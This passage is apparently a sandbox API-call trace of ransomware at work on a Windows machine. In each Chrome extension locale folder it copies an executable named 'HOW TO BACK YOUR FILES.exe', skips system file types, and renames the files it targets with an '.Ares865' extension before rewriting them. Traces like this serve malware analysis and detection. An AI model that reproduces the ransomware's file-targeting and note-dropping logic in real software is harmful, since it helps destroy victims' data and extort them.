Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\et\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\et\\how to back your files.exe"), bFailIfExists=1) returned 0 [0100.582] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0100.582] GetLastError () returned 0x0 [0100.582] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0100.582] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\et\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x83451e50, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e1e1a20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e1e1a20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0100.583] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0100.583] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0100.583] lstrcpyW (in: lpString1=0x2cce528, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0100.583] lstrlenW (lpString="messages.json") returned 13 [0100.583] lstrlenW (lpString="Ares865") returned 7 [0100.583] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0100.583] lstrlenW (lpString=".dll") returned 4 [0100.583] lstrcmpiW (lpString1="messages.json", lpString2=".dll") returned 1 [0100.583] lstrlenW (lpString=".lnk") returned 4 [0100.583] lstrcmpiW (lpString1="messages.json", lpString2=".lnk") returned 1 [0100.583] lstrlenW (lpString=".ini") returned 4 [0100.583] lstrcmpiW (lpString1="messages.json", lpString2=".ini") returned 1 [0100.583] lstrlenW (lpString=".sys") returned 4 [0100.583] lstrcmpiW (lpString1="messages.json", lpString2=".sys") returned 1 [0100.583] lstrlenW (lpString="messages.json") returned 13 [0100.583] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\et\\messages.json.Ares865") returned 169 [0100.583] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\et\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\et\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\et\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\et\\messages.json.ares865"), dwFlags=0x1) returned 1 [0100.585] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\et\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\et\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0100.585] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=16005) returned 1 [0100.588] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\es", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\es") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\es" [0100.588] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\es" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\es") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\es" [0100.588] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0100.588] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\es\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\es\\how to back your files.exe"), bFailIfExists=1) returned 0 [0100.589] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0100.589] GetLastError () returned 0x0 [0100.590] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0100.590] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\es\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8344a920, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e1e1a20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e1e1a20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0100.590] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0100.590] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0100.590] lstrcpyW (in: lpString1=0x2cce528, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0100.590] lstrlenW (lpString="messages.json") returned 13 [0100.590] lstrlenW (lpString="Ares865") returned 7 [0100.590] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0100.590] lstrlenW (lpString=".dll") returned 4 [0100.590] lstrcmpiW (lpString1="messages.json", lpString2=".dll") returned 1 [0100.590] lstrlenW (lpString=".lnk") returned 4 [0100.590] lstrcmpiW (lpString1="messages.json", lpString2=".lnk") returned 1 [0100.590] lstrlenW (lpString=".ini") returned 4 [0100.590] lstrcmpiW (lpString1="messages.json", lpString2=".ini") returned 1 [0100.590] lstrlenW (lpString=".sys") returned 4 [0100.590] lstrcmpiW (lpString1="messages.json", lpString2=".sys") returned 1 [0100.590] lstrlenW (lpString="messages.json") returned 13 [0100.590] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\es\\messages.json.Ares865") returned 169 [0100.590] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\es\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\es\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\es\\messages.json.ares865"), dwFlags=0x1) returned 1 [0100.592] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\es\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\es\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0100.592] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=16459) returned 1 [0100.596] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\en", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\en") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\en" [0100.596] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\en" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\en") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\en" [0100.596] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0100.596] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\en\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\en\\how to back your files.exe"), bFailIfExists=1) returned 0 [0100.596] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0100.597] GetLastError () returned 0x0 [0100.597] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0100.597] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\en\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8343bec0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e1e1a20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e1e1a20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0100.597] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0100.597] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0100.597] lstrcpyW (in: lpString1=0x2cce528, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0100.597] lstrlenW (lpString="messages.json") returned 13 [0100.597] lstrlenW (lpString="Ares865") returned 7 [0100.597] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0100.597] lstrlenW (lpString=".dll") returned 4 [0100.597] lstrcmpiW (lpString1="messages.json", lpString2=".dll") returned 1 [0100.597] lstrlenW (lpString=".lnk") returned 4 [0100.598] lstrcmpiW (lpString1="messages.json", lpString2=".lnk") returned 1 [0100.598] lstrlenW (lpString=".ini") returned 4 [0100.598] lstrcmpiW (lpString1="messages.json", lpString2=".ini") returned 1 [0100.598] lstrlenW (lpString=".sys") returned 4 [0100.598] lstrcmpiW (lpString1="messages.json", lpString2=".sys") returned 1 [0100.598] lstrlenW (lpString="messages.json") returned 13 [0100.598] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\en\\messages.json.Ares865") returned 169 [0100.598] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\en\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\en\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\en\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\en\\messages.json.ares865"), dwFlags=0x1) returned 1 [0100.599] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\en\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\en\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0100.599] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=15738) returned 1 [0100.603] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\el", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\el") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\el" [0100.603] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\el" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\el") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\el" [0100.603] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0100.603] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\el\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\el\\how to back your files.exe"), bFailIfExists=1) returned 0 [0100.604] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0100.604] GetLastError () returned 0x0 [0100.604] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0100.604] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\el\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x83434990, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e207b80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e207b80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0100.604] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0100.604] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0100.605] lstrcpyW (in: lpString1=0x2cce528, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0100.605] lstrlenW (lpString="messages.json") returned 13 [0100.605] lstrlenW (lpString="Ares865") returned 7 [0100.605] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0100.605] lstrlenW (lpString=".dll") returned 4 [0100.605] lstrcmpiW (lpString1="messages.json", lpString2=".dll") returned 1 [0100.605] lstrlenW (lpString=".lnk") returned 4 [0100.605] lstrcmpiW (lpString1="messages.json", lpString2=".lnk") returned 1 [0100.605] lstrlenW (lpString=".ini") returned 4 [0100.605] lstrcmpiW (lpString1="messages.json", lpString2=".ini") returned 1 [0100.605] lstrlenW (lpString=".sys") returned 4 [0100.605] lstrcmpiW (lpString1="messages.json", lpString2=".sys") returned 1 [0100.605] lstrlenW (lpString="messages.json") returned 13 [0100.605] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\el\\messages.json.Ares865") returned 169 [0100.605] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\el\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\el\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\el\\messages.json.ares865"), dwFlags=0x1) returned 1 [0100.606] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\el\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\el\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0100.607] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=19198) returned 1 [0100.610] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\de", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\de") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\de" [0100.610] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\de" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\de") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\de" [0100.610] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0100.611] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\de\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\de\\how to back your files.exe"), bFailIfExists=1) returned 0 [0100.611] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0100.611] GetLastError () returned 0x0 [0100.612] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0100.612] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\de\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8342d460, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e207b80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e207b80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0100.612] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0100.612] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0100.612] lstrcpyW (in: lpString1=0x2cce528, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0100.612] lstrlenW (lpString="messages.json") returned 13 [0100.612] lstrlenW (lpString="Ares865") returned 7 [0100.612] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0100.612] lstrlenW (lpString=".dll") returned 4 